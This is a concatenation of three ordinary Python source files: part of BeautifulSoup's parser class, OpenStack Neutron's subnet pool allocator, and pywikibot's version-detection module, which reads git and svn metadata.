def _feed(self):
"""Internal method that parses previously set markup, creating a large
number of Tag and NavigableString objects.
"""
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
"""Reset this object to a state as though it had never parsed any
markup.
"""
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.current_data = []
self.currentTag = None
self.tagStack = []
self.open_tag_counter = Counter()
self.preserve_whitespace_tag_stack = []
self.string_container_stack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, attrs={},
sourceline=None, sourcepos=None, **kwattrs):
"""Create a new Tag associated with this BeautifulSoup object.
:param name: The name of the new Tag.
:param namespace: The URI of the new Tag's XML namespace, if any.
        :param nsprefix: The prefix for the new Tag's XML namespace, if any.
:param attrs: A dictionary of this Tag's attribute values; can
be used instead of `kwattrs` for attributes like 'class'
that are reserved words in Python.
:param sourceline: The line number where this tag was
(purportedly) found in its source document.
:param sourcepos: The character position within `sourceline` where this
tag was (purportedly) found.
:param kwattrs: Keyword arguments for the new Tag's attribute values.
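        A short sketch (the attribute name is illustrative)::

            soup = BeautifulSoup("<b></b>", "html.parser")
            link = soup.new_tag("a", href="http://example.com")
            soup.b.append(link)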
"""
kwattrs.update(attrs)
return self.element_classes.get(Tag, Tag)(
None, self.builder, name, namespace, nsprefix, kwattrs,
sourceline=sourceline, sourcepos=sourcepos
)
def string_container(self, base_class=None):
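        """Determine the container class for a string found at this point
        in the parse: the explicit `base_class` if given, then any general
        override registered in `element_classes`, then any tag-specific
        container supplied by the tree builder.
        """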
container = base_class or NavigableString
# There may be a general override of NavigableString.
container = self.element_classes.get(
container, container
)
# On top of that, we may be inside a tag that needs a special
# container class.
if self.string_container_stack:
container = self.builder.string_containers.get(
self.string_container_stack[-1].name, container
)
return container
def new_string(self, s, subclass=None):
"""Create a new NavigableString associated with this BeautifulSoup
object.
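        A short sketch (assuming `soup` is an existing BeautifulSoup
        object)::

            s = soup.new_string("some text")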
"""
container = self.string_container(subclass)
return container(s)
def insert_before(self, *args):
"""This method is part of the PageElement API, but `BeautifulSoup` doesn't implement
it because there is nothing before or after it in the parse tree.
"""
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, *args):
"""This method is part of the PageElement API, but `BeautifulSoup` doesn't implement
it because there is nothing before or after it in the parse tree.
"""
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
"""Internal method called by _popToTag when a tag is closed."""
tag = self.tagStack.pop()
if tag.name in self.open_tag_counter:
self.open_tag_counter[tag.name] -= 1
if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
self.preserve_whitespace_tag_stack.pop()
if self.string_container_stack and tag == self.string_container_stack[-1]:
self.string_container_stack.pop()
#print("Pop", tag.name)
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
"""Internal method called by handle_starttag when a tag is opened."""
#print("Push", tag.name)
if self.currentTag is not None:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
if tag.name != self.ROOT_TAG_NAME:
self.open_tag_counter[tag.name] += 1
if tag.name in self.builder.preserve_whitespace_tags:
self.preserve_whitespace_tag_stack.append(tag)
if tag.name in self.builder.string_containers:
self.string_container_stack.append(tag)
def endData(self, containerClass=None):
"""Method called by the TreeBuilder when the end of a data segment
occurs.
"""
containerClass = self.string_container(containerClass)
if self.current_data:
current_data = ''.join(self.current_data)
# If whitespace is not preserved, and this string contains
# nothing but ASCII spaces, replace it with a single space
# or newline.
if not self.preserve_whitespace_tag_stack:
strippable = True
for i in current_data:
if i not in self.ASCII_SPACES:
strippable = False
break
if strippable:
if '\n' in current_data:
current_data = '\n'
else:
current_data = ' '
# Reset the data collector.
self.current_data = []
# Should we add this string to the tree at all?
if self.parse_only and len(self.tagStack) <= 1 and \
(not self.parse_only.text or \
not self.parse_only.search(current_data)):
return
o = containerClass(current_data)
self.object_was_parsed(o)
def object_was_parsed(self, o, parent=None, most_recent_element=None):
"""Method called by the TreeBuilder to integrate an object into the parse tree."""
if parent is None:
parent = self.currentTag
if most_recent_element is not None:
previous_element = most_recent_element
else:
previous_element = self._most_recent_element
next_element = previous_sibling = next_sibling = None
if isinstance(o, Tag):
next_element = o.next_element
next_sibling = o.next_sibling
previous_sibling = o.previous_sibling
if previous_element is None:
previous_element = o.previous_element
fix = parent.next_element is not None
o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
self._most_recent_element = o
parent.contents.append(o)
# Check if we are inserting into an already parsed node.
if fix:
self._linkage_fixer(parent)
def _linkage_fixer(self, el):
"""Make sure linkage of this fragment is sound."""
first = el.contents[0]
child = el.contents[-1]
descendant = child
if child is first and el.parent is not None:
# Parent should be linked to first child
el.next_element = child
# We are no longer linked to whatever this element is
prev_el = child.previous_element
if prev_el is not None and prev_el is not el:
prev_el.next_element = None
# First child should be linked to the parent, and no previous siblings.
child.previous_element = el
child.previous_sibling = None
# We have no sibling as we've been appended as the last.
child.next_sibling = None
# This index is a tag, dig deeper for a "last descendant"
if isinstance(child, Tag) and child.contents:
descendant = child._last_descendant(False)
# As the final step, link last descendant. It should be linked
# to the parent's next sibling (if found), else walk up the chain
# and find a parent with a sibling. It should have no next sibling.
descendant.next_element = None
descendant.next_sibling = None
target = el
while True:
if target is None:
break
elif target.next_sibling is not None:
descendant.next_element = target.next_sibling
target.next_sibling.previous_element = child
break
target = target.parent
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag.
If there are no open tags with the given name, nothing will be
popped.
:param name: Pop up to the most recent tag with this name.
:param nsprefix: The namespace prefix that goes with `name`.
        :param inclusivePop: If this is false, pops the tag stack up
          to but *not* including the most recent instance of the
          given tag.
"""
#print("Popping to %s" % name)
if name == self.ROOT_TAG_NAME:
# The BeautifulSoup object itself can never be popped.
return
most_recently_popped = None
stack_size = len(self.tagStack)
for i in range(stack_size - 1, 0, -1):
if not self.open_tag_counter.get(name):
break
t = self.tagStack[i]
if (name == t.name and nsprefix == t.prefix):
if inclusivePop:
most_recently_popped = self.popTag()
break
most_recently_popped = self.popTag()
return most_recently_popped
def handle_starttag(self, name, namespace, nsprefix, attrs, sourceline=None,
sourcepos=None):
"""Called by the tree builder when a new tag is encountered.
:param name: Name of the tag.
        :param namespace: The URI of the tag's XML namespace, if any.
        :param nsprefix: Namespace prefix for the tag.
:param attrs: A dictionary of attribute values.
:param sourceline: The line number where this tag was found in its
source document.
:param sourcepos: The character position within `sourceline` where this
tag was found.
If this method returns None, the tag was rejected by an active
SoupStrainer. You should proceed as if the tag had not occurred
in the document. For instance, if this was a self-closing tag,
don't call handle_endtag.
"""
# print("Start tag %s: %s" % (name, attrs))
self.endData()
if (self.parse_only and len(self.tagStack) <= 1
and (self.parse_only.text
or not self.parse_only.search_tag(name, attrs))):
return None
tag = self.element_classes.get(Tag, Tag)(
self, self.builder, name, namespace, nsprefix, attrs,
self.currentTag, self._most_recent_element,
sourceline=sourceline, sourcepos=sourcepos
)
if tag is None:
return tag
if self._most_recent_element is not None:
self._most_recent_element.next_element = tag
self._most_recent_element = tag
self.pushTag(tag)
return tag
def handle_endtag(self, name, nsprefix=None):
"""Called by the tree builder when an ending tag is encountered.
:param name: Name of the tag.
:param nsprefix: Namespace prefix for the tag.
"""
#print("End tag: " + name)
self.endData()
self._popToTag(name, nsprefix)
def handle_data(self, data):
"""Called by the tree builder when a chunk of textual data is encountered."""
self.current_data.append(data)
def decode(self, pretty_print=False,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
formatter="minimal"):
"""Returns a string or Unicode representation of the parse tree
as an HTML or XML document.
:param pretty_print: If this is True, indentation will be used to
make the document more readable.
:param eventual_encoding: The encoding of the final document.
If this is None, the document will be a Unicode string.
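        A short sketch (assuming `soup` is an already-parsed document)::

            print(soup.decode(pretty_print=True))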
"""
if self.is_xml:
# Print the XML declaration
encoding_part = ''
if eventual_encoding in PYTHON_SPECIFIC_ENCODINGS:
# This is a special Python encoding; it can't actually
# go into an XML document because it means nothing
# outside of Python.
eventual_encoding = None
            if eventual_encoding is not None:
encoding_part = ' encoding="%s"' % eventual_encoding
prefix = '<?xml version="1.0"%s?>\n' % encoding_part
else:
prefix = ''
if not pretty_print:
indent_level = None
else:
indent_level = 0
return prefix + super(BeautifulSoup, self).decode(
indent_level, eventual_encoding, formatter)
# Aliases to make it easier to get started quickly, e.g. 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
"""Deprecated interface to an XML parser."""
def __init__(self, *args, **kwargs):
kwargs['features'] = 'xml'
warnings.warn(
'The BeautifulStoneSoup class is deprecated. Instead of using '
'it, pass features="xml" into the BeautifulSoup constructor.')
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
"""Exception raised by a TreeBuilder if it's unable to continue parsing."""
pass
class FeatureNotFound(ValueError):
"""Exception raised by the BeautifulSoup constructor if no parser with the
requested features is found.
"""
pass
# If this file is run as a script, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print((soup.prettify()))
|
|
# Copyright (c) 2015 Hewlett-Packard Co.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import operator
import netaddr
from oslo_db import exception as db_exc
from oslo_utils import uuidutils
from neutron._i18n import _
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.common import exceptions as n_exc
from neutron.db import models_v2
from neutron.ipam import driver
from neutron.ipam import requests as ipam_req
from neutron.ipam import utils as ipam_utils
class SubnetAllocator(driver.Pool):
"""Class for handling allocation of subnet prefixes from a subnet pool.
This class leverages the pluggable IPAM interface where possible to
make merging into IPAM framework easier in future cycles.
"""
def __init__(self, subnetpool, context):
super(SubnetAllocator, self).__init__(subnetpool, context)
self._sp_helper = SubnetPoolHelper()
def _lock_subnetpool(self):
"""Lock subnetpool associated row.
This method disallows to allocate concurrently 2 subnets in the same
subnetpool, it's required to ensure non-overlapping cidrs in the same
subnetpool.
"""
current_hash = (self._context.session.query(models_v2.SubnetPool.hash)
.filter_by(id=self._subnetpool['id']).scalar())
if current_hash is None:
# NOTE(cbrandily): subnetpool has been deleted
raise n_exc.SubnetPoolNotFound(
subnetpool_id=self._subnetpool['id'])
new_hash = uuidutils.generate_uuid()
        # NOTE(cbrandily): the update prevents two concurrent subnet
        # allocations from succeeding: at most one transaction will
        # succeed; the others will be rolled back and caught in
        # neutron.db.v2.base
query = self._context.session.query(models_v2.SubnetPool).filter_by(
id=self._subnetpool['id'], hash=current_hash)
count = query.update({'hash': new_hash})
if not count:
raise db_exc.RetryRequest(n_exc.SubnetPoolInUse(
subnet_pool_id=self._subnetpool['id']))
def _get_allocated_cidrs(self):
query = self._context.session.query(models_v2.Subnet)
subnets = query.filter_by(subnetpool_id=self._subnetpool['id'])
return (x.cidr for x in subnets)
def _get_available_prefix_list(self):
prefixes = (x.cidr for x in self._subnetpool.prefixes)
allocations = self._get_allocated_cidrs()
prefix_set = netaddr.IPSet(iterable=prefixes)
allocation_set = netaddr.IPSet(iterable=allocations)
available_set = prefix_set.difference(allocation_set)
available_set.compact()
return sorted(available_set.iter_cidrs(),
key=operator.attrgetter('prefixlen'),
reverse=True)
def _num_quota_units_in_prefixlen(self, prefixlen, quota_unit):
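        # Illustrative example: with quota_unit=32 (IPv4), a /24
        # allocation consumes 2 ** (32 - 24) = 256 quota units.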
return math.pow(2, quota_unit - prefixlen)
def _allocations_used_by_tenant(self, quota_unit):
subnetpool_id = self._subnetpool['id']
tenant_id = self._subnetpool['tenant_id']
with self._context.session.begin(subtransactions=True):
qry = self._context.session.query(models_v2.Subnet)
allocations = qry.filter_by(subnetpool_id=subnetpool_id,
tenant_id=tenant_id)
value = 0
for allocation in allocations:
prefixlen = netaddr.IPNetwork(allocation.cidr).prefixlen
value += self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
return value
def _check_subnetpool_tenant_quota(self, tenant_id, prefixlen):
quota_unit = self._sp_helper.ip_version_subnetpool_quota_unit(
self._subnetpool['ip_version'])
quota = self._subnetpool.get('default_quota')
if quota:
used = self._allocations_used_by_tenant(quota_unit)
requested_units = self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
if used + requested_units > quota:
raise n_exc.SubnetPoolQuotaExceeded()
def _allocate_any_subnet(self, request):
with self._context.session.begin(subtransactions=True):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
prefix_pool = self._get_available_prefix_list()
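            # Illustrative example: a request for a /24 against an
            # available 10.0.0.0/16 prefix yields 10.0.0.0/24, the first
            # /24 carved from that prefix.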
for prefix in prefix_pool:
if request.prefixlen >= prefix.prefixlen:
subnet = next(prefix.subnet(request.prefixlen))
gateway_ip = request.gateway_ip
if not gateway_ip:
gateway_ip = subnet.network + 1
pools = ipam_utils.generate_pools(subnet.cidr,
gateway_ip)
return IpamSubnet(request.tenant_id,
request.subnet_id,
subnet.cidr,
gateway_ip=gateway_ip,
allocation_pools=pools)
msg = _("Insufficient prefix space to allocate subnet size /%s")
raise n_exc.SubnetAllocationError(reason=msg %
str(request.prefixlen))
def _allocate_specific_subnet(self, request):
with self._context.session.begin(subtransactions=True):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
cidr = request.subnet_cidr
available = self._get_available_prefix_list()
matched = netaddr.all_matching_cidrs(cidr, available)
            if len(matched) == 1 and matched[0].prefixlen <= cidr.prefixlen:
return IpamSubnet(request.tenant_id,
request.subnet_id,
cidr,
gateway_ip=request.gateway_ip,
allocation_pools=request.allocation_pools)
msg = _("Cannot allocate requested subnet from the available "
"set of prefixes")
raise n_exc.SubnetAllocationError(reason=msg)
def allocate_subnet(self, request):
max_prefixlen = int(self._subnetpool['max_prefixlen'])
min_prefixlen = int(self._subnetpool['min_prefixlen'])
if request.prefixlen > max_prefixlen:
raise n_exc.MaxPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
max_prefixlen=max_prefixlen)
if request.prefixlen < min_prefixlen:
raise n_exc.MinPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
min_prefixlen=min_prefixlen)
if isinstance(request, ipam_req.AnySubnetRequest):
return self._allocate_any_subnet(request)
elif isinstance(request, ipam_req.SpecificSubnetRequest):
return self._allocate_specific_subnet(request)
else:
msg = _("Unsupported request type")
raise n_exc.SubnetAllocationError(reason=msg)
def get_subnet(self, subnet_id):
raise NotImplementedError()
def update_subnet(self, request):
raise NotImplementedError()
def remove_subnet(self, subnet_id):
raise NotImplementedError()
class IpamSubnet(driver.Subnet):
def __init__(self,
tenant_id,
subnet_id,
cidr,
gateway_ip=None,
allocation_pools=None):
self._req = ipam_req.SpecificSubnetRequest(
tenant_id,
subnet_id,
cidr,
gateway_ip=gateway_ip,
allocation_pools=allocation_pools)
def allocate(self, address_request):
raise NotImplementedError()
def deallocate(self, address):
raise NotImplementedError()
def get_details(self):
return self._req
class SubnetPoolReader(object):
'''Class to assist with reading a subnetpool, loading defaults, and
inferring IP version from prefix list. Provides a common way of
reading a stored model or a create request with default table
attributes.
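    A minimal usage sketch (assuming `subnetpool` is a complete create
    request or stored model dict):
        reader = SubnetPoolReader(subnetpool)
        pool_dict = reader.subnetpool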
'''
MIN_PREFIX_TYPE = 'min'
MAX_PREFIX_TYPE = 'max'
DEFAULT_PREFIX_TYPE = 'default'
_sp_helper = None
def __init__(self, subnetpool):
self._read_prefix_info(subnetpool)
self._sp_helper = SubnetPoolHelper()
self._read_id(subnetpool)
self._read_prefix_bounds(subnetpool)
self._read_attrs(subnetpool,
['tenant_id', 'name', 'is_default', 'shared'])
self.description = subnetpool.get('description')
self._read_address_scope(subnetpool)
self.subnetpool = {'id': self.id,
'name': self.name,
'tenant_id': self.tenant_id,
'prefixes': self.prefixes,
'min_prefix': self.min_prefix,
'min_prefixlen': self.min_prefixlen,
'max_prefix': self.max_prefix,
'max_prefixlen': self.max_prefixlen,
'default_prefix': self.default_prefix,
'default_prefixlen': self.default_prefixlen,
'default_quota': self.default_quota,
'address_scope_id': self.address_scope_id,
'is_default': self.is_default,
'shared': self.shared,
'description': self.description}
def _read_attrs(self, subnetpool, keys):
for key in keys:
setattr(self, key, subnetpool[key])
def _ip_version_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).version
def _prefixlen_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).prefixlen
def _read_id(self, subnetpool):
id = subnetpool.get('id', attributes.ATTR_NOT_SPECIFIED)
if id is attributes.ATTR_NOT_SPECIFIED:
id = uuidutils.generate_uuid()
self.id = id
def _read_prefix_bounds(self, subnetpool):
ip_version = self.ip_version
default_min = self._sp_helper.default_min_prefixlen(ip_version)
default_max = self._sp_helper.default_max_prefixlen(ip_version)
self._read_prefix_bound(self.MIN_PREFIX_TYPE,
subnetpool,
default_min)
self._read_prefix_bound(self.MAX_PREFIX_TYPE,
subnetpool,
default_max)
self._read_prefix_bound(self.DEFAULT_PREFIX_TYPE,
subnetpool,
self.min_prefixlen)
self._sp_helper.validate_min_prefixlen(self.min_prefixlen,
self.max_prefixlen)
self._sp_helper.validate_max_prefixlen(self.max_prefixlen,
ip_version)
self._sp_helper.validate_default_prefixlen(self.min_prefixlen,
self.max_prefixlen,
self.default_prefixlen)
def _read_prefix_bound(self, type, subnetpool, default_bound=None):
prefixlen_attr = type + '_prefixlen'
prefix_attr = type + '_prefix'
prefixlen = subnetpool.get(prefixlen_attr,
attributes.ATTR_NOT_SPECIFIED)
wildcard = self._sp_helper.wildcard(self.ip_version)
if prefixlen is attributes.ATTR_NOT_SPECIFIED and default_bound:
prefixlen = default_bound
if prefixlen is not attributes.ATTR_NOT_SPECIFIED:
prefix_cidr = '/'.join((wildcard,
str(prefixlen)))
setattr(self, prefix_attr, prefix_cidr)
setattr(self, prefixlen_attr, prefixlen)
def _read_prefix_info(self, subnetpool):
prefix_list = subnetpool['prefixes']
if not prefix_list:
raise n_exc.EmptySubnetPoolPrefixList()
ip_version = None
for prefix in prefix_list:
if not ip_version:
ip_version = netaddr.IPNetwork(prefix).version
elif netaddr.IPNetwork(prefix).version != ip_version:
raise n_exc.PrefixVersionMismatch()
self.default_quota = subnetpool.get('default_quota')
if self.default_quota is attributes.ATTR_NOT_SPECIFIED:
self.default_quota = None
self.ip_version = ip_version
self.prefixes = self._compact_subnetpool_prefix_list(prefix_list)
def _read_address_scope(self, subnetpool):
self.address_scope_id = subnetpool.get('address_scope_id',
attributes.ATTR_NOT_SPECIFIED)
def _compact_subnetpool_prefix_list(self, prefix_list):
"""Compact any overlapping prefixes in prefix_list and return the
result
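        For example (illustrative), ['10.0.0.0/24', '10.0.1.0/24']
        compacts to ['10.0.0.0/23'].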
"""
ip_set = netaddr.IPSet()
for prefix in prefix_list:
ip_set.add(netaddr.IPNetwork(prefix))
ip_set.compact()
return [str(x.cidr) for x in ip_set.iter_cidrs()]
class SubnetPoolHelper(object):
_PREFIX_VERSION_INFO = {4: {'max_prefixlen': constants.IPv4_BITS,
'wildcard': '0.0.0.0',
'default_min_prefixlen': 8,
# IPv4 quota measured in units of /32
'quota_units': 32},
6: {'max_prefixlen': constants.IPv6_BITS,
'wildcard': '::',
'default_min_prefixlen': 64,
# IPv6 quota measured in units of /64
'quota_units': 64}}
def validate_min_prefixlen(self, min_prefixlen, max_prefixlen):
if min_prefixlen < 0:
raise n_exc.UnsupportedMinSubnetPoolPrefix(prefix=min_prefixlen,
version=4)
if min_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='min_prefixlen',
prefixlen=min_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def validate_max_prefixlen(self, prefixlen, ip_version):
max = self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
if prefixlen > max:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='max_prefixlen',
prefixlen=prefixlen,
base_prefix_type='ip_version_max',
base_prefixlen=max)
def validate_default_prefixlen(self,
min_prefixlen,
max_prefixlen,
default_prefixlen):
if default_prefixlen < min_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='min_prefixlen',
base_prefixlen=min_prefixlen)
if default_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def wildcard(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['wildcard']
def default_max_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
def default_min_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['default_min_prefixlen']
def ip_version_subnetpool_quota_unit(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['quota_units']
|
|
# -*- coding: utf-8 -*-
"""Module to determine the pywikibot version (tag, revision and date)."""
#
# (C) Merlijn 'valhallasw' van Deen, 2007-2014
# (C) xqt, 2010-2015
# (C) Pywikibot team, 2007-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
import os
import sys
import time
import datetime
import subprocess
import codecs
from warnings import warn
try:
from setuptools import svn_utils
except ImportError:
try:
from setuptools_svn import svn_utils
except ImportError as e:
svn_utils = e
import pywikibot
from pywikibot import config2 as config
from pywikibot.tools import deprecated, PY2
if not PY2:
basestring = (str, )
cache = None
_logger = 'version'
class ParseError(Exception):
"""Parsing went wrong."""
def _get_program_dir():
_program_dir = os.path.normpath(os.path.split(os.path.dirname(__file__))[0])
return _program_dir
def getversion(online=True):
"""Return a pywikibot version string.
@param online: (optional) Include information obtained online
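    Illustrative output only (the values here are examples, not real):
    '[https] wikimedia-pywikibot-core (1a2b3c4, g5678, 2015/06/01, ok)'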
"""
data = dict(getversiondict()) # copy dict to prevent changes in 'cache'
data['cmp_ver'] = 'n/a'
if online:
try:
hsh2 = getversion_onlinerepo()
hsh1 = data['hsh']
data['cmp_ver'] = 'OUTDATED' if hsh1 != hsh2 else 'ok'
except Exception:
pass
data['hsh'] = data['hsh'][:7] # make short hash from full hash
return '%(tag)s (%(hsh)s, %(rev)s, %(date)s, %(cmp_ver)s)' % data
def getversiondict():
"""Get version info for the package.
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{dict} of four C{str}
"""
global cache
if cache:
return cache
_program_dir = _get_program_dir()
exceptions = {}
for vcs_func in (getversion_git,
getversion_svn_setuptools,
getversion_nightly,
getversion_svn,
getversion_package):
try:
(tag, rev, date, hsh) = vcs_func(_program_dir)
except Exception as e:
exceptions[vcs_func] = e
else:
break
else:
# nothing worked; version unknown (but suppress exceptions)
        # the value is most likely '$Id' + '$', which means that
        # pywikibot was imported without using version control at all.
tag, rev, date, hsh = (
'', '-1 (unknown)', '0 (unknown)', '(unknown)')
# git and svn can silently fail, as it may be a nightly.
if getversion_package in exceptions:
warn('Unable to detect version; exceptions raised:\n%r'
% exceptions, UserWarning)
elif exceptions:
pywikibot.debug('version algorithm exceptions:\n%r'
% exceptions, _logger)
if isinstance(date, basestring):
datestring = date
elif isinstance(date, time.struct_time):
datestring = time.strftime('%Y/%m/%d, %H:%M:%S', date)
else:
warn('Unable to detect package date', UserWarning)
datestring = '-2 (unknown)'
cache = dict(tag=tag, rev=rev, date=datestring, hsh=hsh)
return cache
@deprecated('getversion_svn_setuptools')
def svn_rev_info(path):
"""Fetch information about the current revision of an Subversion checkout.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
@rtype: C{tuple} of two C{str} and a C{time.struct_time}
"""
if not os.path.isdir(os.path.join(path, '.svn')):
path = os.path.join(path, '..')
_program_dir = path
filename = os.path.join(_program_dir, '.svn/entries')
if os.path.isfile(filename):
with open(filename) as entries:
version = entries.readline().strip()
if version != '12':
for i in range(3):
entries.readline()
tag = entries.readline().strip()
t = tag.split('://')
t[1] = t[1].replace('svn.wikimedia.org/svnroot/pywikipedia/',
'')
tag = '[%s] %s' % (t[0], t[1])
for i in range(4):
entries.readline()
date = time.strptime(entries.readline()[:19],
'%Y-%m-%dT%H:%M:%S')
rev = entries.readline()[:-1]
return tag, rev, date
# We haven't found the information in entries file.
# Use sqlite table for new entries format
from sqlite3 import dbapi2 as sqlite
con = sqlite.connect(os.path.join(_program_dir, ".svn/wc.db"))
cur = con.cursor()
cur.execute("""select
local_relpath, repos_path, revision, changed_date, checksum from nodes
order by revision desc, changed_date desc""")
name, tag, rev, date, checksum = cur.fetchone()
cur.execute("select root from repository")
tag, = cur.fetchone()
con.close()
tag = os.path.split(tag)[1]
date = time.gmtime(date / 1000000)
return tag, rev, date
def github_svn_rev2hash(tag, rev):
"""Convert a Subversion revision to a Git hash using Github.
@param tag: name of the Subversion repo on Github
@param rev: Subversion revision identifier
@return: the git hash
@rtype: str
"""
from io import StringIO
import xml.dom.minidom
from pywikibot.comms import http
uri = 'https://github.com/wikimedia/%s/!svn/vcc/default' % tag
request = http.fetch(uri=uri, method='PROPFIND',
body="<?xml version='1.0' encoding='utf-8'?>"
"<propfind xmlns=\"DAV:\"><allprop/></propfind>",
headers={'label': str(rev),
'user-agent': 'SVN/1.7.5 {pwb}'})
data = request.content
dom = xml.dom.minidom.parse(StringIO(data))
hsh = dom.getElementsByTagName("C:git-commit")[0].firstChild.nodeValue
date = dom.getElementsByTagName("S:date")[0].firstChild.nodeValue
date = time.strptime(date[:19], '%Y-%m-%dT%H:%M:%S')
return hsh, date
def getversion_svn_setuptools(path=None):
"""Get version info for a Subversion checkout using setuptools.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
- hash (git hash for the Subversion revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
if isinstance(svn_utils, Exception):
raise svn_utils
tag = 'pywikibot-core'
_program_dir = path or _get_program_dir()
svninfo = svn_utils.SvnInfo(_program_dir)
rev = svninfo.get_revision()
if not isinstance(rev, int):
raise TypeError('SvnInfo.get_revision() returned type %s' % type(rev))
if rev < 0:
raise ValueError('SvnInfo.get_revision() returned %d' % rev)
if rev == 0:
raise ParseError('SvnInfo: invalid workarea')
hsh, date = github_svn_rev2hash(tag, rev)
rev = 's%s' % rev
return (tag, rev, date, hsh)
@deprecated('getversion_svn_setuptools')
def getversion_svn(path=None):
"""Get version info for a Subversion checkout.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
- hash (git hash for the Subversion revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
_program_dir = path or _get_program_dir()
tag, rev, date = svn_rev_info(_program_dir)
hsh, date2 = github_svn_rev2hash(tag, rev)
if date.tm_isdst >= 0 and date2.tm_isdst >= 0:
assert date == date2, 'Date of version is not consistent'
    # tm_isdst == -1 means the daylight saving time state is unknown;
    # in that case compare the fields except the DST flag.
else:
for i in range(date.n_fields - 1):
assert date[i] == date2[i], 'Date of version is not consistent'
rev = 's%s' % rev
if (not date or not tag or not rev) and not path:
raise ParseError
return (tag, rev, date, hsh)
def getversion_git(path=None):
"""Get version info for a Git clone.
@param path: directory of the Git checkout
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
_program_dir = path or _get_program_dir()
cmd = 'git'
try:
subprocess.Popen([cmd], stdout=subprocess.PIPE).communicate()
except OSError:
# some windows git versions provide git.cmd instead of git.exe
cmd = 'git.cmd'
with open(os.path.join(_program_dir, '.git/config'), 'r') as f:
tag = f.read()
# Try 'origin' and then 'gerrit' as remote name; bail if can't find either.
remote_pos = tag.find('[remote "origin"]')
if remote_pos == -1:
remote_pos = tag.find('[remote "gerrit"]')
if remote_pos == -1:
tag = '?'
else:
s = tag.find('url = ', remote_pos)
e = tag.find('\n', s)
tag = tag[(s + 6):e]
t = tag.strip().split('/')
tag = '[%s] %s' % (t[0][:-1], '-'.join(t[3:]))
with subprocess.Popen([cmd, '--no-pager',
'log', '-1',
                           '--pretty=format:"%ad|%an|%h|%H|%d"',
                           '--abbrev-commit',
'--date=iso'],
cwd=_program_dir,
stdout=subprocess.PIPE).stdout as stdout:
info = stdout.read()
info = info.decode(config.console_encoding).split('|')
date = info[0][:-6]
date = time.strptime(date.strip('"'), '%Y-%m-%d %H:%M:%S')
with subprocess.Popen([cmd, 'rev-list', 'HEAD'],
cwd=_program_dir,
stdout=subprocess.PIPE).stdout as stdout:
rev = stdout.read()
rev = 'g%s' % len(rev.splitlines())
hsh = info[3] # also stored in '.git/refs/heads/master'
if (not date or not tag or not rev) and not path:
raise ParseError
return (tag, rev, date, hsh)
def getversion_nightly(path=None):
"""Get version info for a nightly release.
@param path: directory of the uncompressed nightly.
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
if not path:
